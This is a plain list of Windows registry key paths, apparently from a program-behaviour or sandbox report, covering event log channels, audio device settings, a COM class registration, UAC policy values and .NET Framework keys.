HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NameResource
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NeverLowerPagePriority
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NameResource
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WDI\Config
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\Config\ServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\CLResolutionInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\DisplayInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\SkipWatson
HKEY_LOCAL_MACHINE\Software\Microsoft\RADAR\HeapLeakDetection\Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\Settings\ReflectionInterval
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\eventlog\System\USER32
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\System\USER32\ProviderGuid
HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\eventlog\Microsoft-Windows-WindowsUpdateClient/Operational
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\ClockType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\OwningPublisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\ChannelAccess
HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\eventlog\Microsoft-Windows-NetworkAccessProtection/WHC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\ClockType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\OwningPublisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\ChannelAccess
HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\eventlog\Microsoft-Windows-Windows Defender/WHC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\ClockType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\OwningPublisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\ChannelAccess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties\{f19f064d-082c-4e27-bc73-6882a1bb8e4c},0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{f0a94b61-1058-4fc2-a399-e1993f00d33a}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{f0a94b61-1058-4fc2-a399-e1993f00d33a}\Properties
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{f0a94b61-1058-4fc2-a399-e1993f00d33a}\Properties\{f19f064d-082c-4e27-bc73-6882a1bb8e4c},0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{8ffeba2b-46f7-4109-9e36-e28c93d90faa}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Capture\{8ffeba2b-46f7-4109-9e36-e28c93d90faa}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Capture\{8ffeba2b-46f7-4109-9e36-e28c93d90faa}\Properties
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Capture\{8ffeba2b-46f7-4109-9e36-e28c93d90faa}\Properties\{f19f064d-082c-4e27-bc73-6882a1bb8e4c},0
HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\eventlog\Microsoft-Windows-Diagnosis-Scheduled/Operational
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\ClockType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\OwningPublisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\ChannelAccess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties\{e4870e26-3cc5-4cd2-ba46-ca0a9a70ed04},0
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Internet Explorer\LowRegistry
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\SymbolicLinkValue
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\SymbolicLinkValue
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\SymbolicLinkValue
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\7a586aef_0
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\7a586aef_0\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\FxProperties
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\FxProperties\{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\FxProperties\{d04e05a6-594b-4fb6-a80d-01af5eed7d1d},1
HKEY_CLASSES_ROOT\AudioEngine\AudioProcessingObjects
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{62DC1A93-AE24-464C-A43E-452F824C4250}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{62DC1A93-AE24-464C-A43E-452F824C4250}\FriendlyName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{62DC1A93-AE24-464C-A43E-452F824C4250}\Copyright
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{62DC1A93-AE24-464C-A43E-452F824C4250}\MajorVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{62DC1A93-AE24-464C-A43E-452F824C4250}\MinorVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{62DC1A93-AE24-464C-A43E-452F824C4250}\Flags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{62DC1A93-AE24-464C-A43E-452F824C4250}\MinInputConnections
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{62DC1A93-AE24-464C-A43E-452F824C4250}\MaxInputConnections
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{62DC1A93-AE24-464C-A43E-452F824C4250}\MinOutputConnections
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{62DC1A93-AE24-464C-A43E-452F824C4250}\MaxOutputConnections
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{62DC1A93-AE24-464C-A43E-452F824C4250}\MaxInstances
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{62DC1A93-AE24-464C-A43E-452F824C4250}\APOInterface0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc},4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties\{e4870e26-3cc5-4cd2-ba46-ca0a9a70ed04},1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties\{e4870e26-3cc5-4cd2-ba46-ca0a9a70ed04},4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\FxProperties\{d04e05a6-594b-4fb6-a80d-01af5eed7d1d},2
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{637C490D-EEE3-4C0A-973F-371958802DA2}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{637C490D-EEE3-4C0A-973F-371958802DA2}\FriendlyName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{637C490D-EEE3-4C0A-973F-371958802DA2}\Copyright
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{637C490D-EEE3-4C0A-973F-371958802DA2}\MajorVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{637C490D-EEE3-4C0A-973F-371958802DA2}\MinorVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{637C490D-EEE3-4C0A-973F-371958802DA2}\Flags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{637C490D-EEE3-4C0A-973F-371958802DA2}\MinInputConnections
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{637C490D-EEE3-4C0A-973F-371958802DA2}\MaxInputConnections
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{637C490D-EEE3-4C0A-973F-371958802DA2}\MinOutputConnections
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{637C490D-EEE3-4C0A-973F-371958802DA2}\MaxOutputConnections
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{637C490D-EEE3-4C0A-973F-371958802DA2}\MaxInstances
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{637C490D-EEE3-4C0A-973F-371958802DA2}\APOInterface0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FD7F2B29-24D0-4B5C-B177-592C39F9CA10}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FD7F2B29-24D0-4B5C-B177-592C39F9CA10}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FD7F2B29-24D0-4B5C-B177-592C39F9CA10}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FD7F2B29-24D0-4B5C-B177-592C39F9CA10}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FD7F2B29-24D0-4B5C-B177-592C39F9CA10}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FD7F2B29-24D0-4B5C-B177-592C39F9CA10}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FD7F2B29-24D0-4B5C-B177-592C39F9CA10}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FD7F2B29-24D0-4B5C-B177-592C39F9CA10}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FD7F2B29-24D0-4B5C-B177-592C39F9CA10}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FD7F2B29-24D0-4B5C-B177-592C39F9CA10}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FD7F2B29-24D0-4B5C-B177-592C39F9CA10}\InprocHandler
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Audio
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Audio\AudioDGInactiveTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DiskDiagnostics
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DiskDiagnostics\DFDCollectorInvokeTimes
Read Keys
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
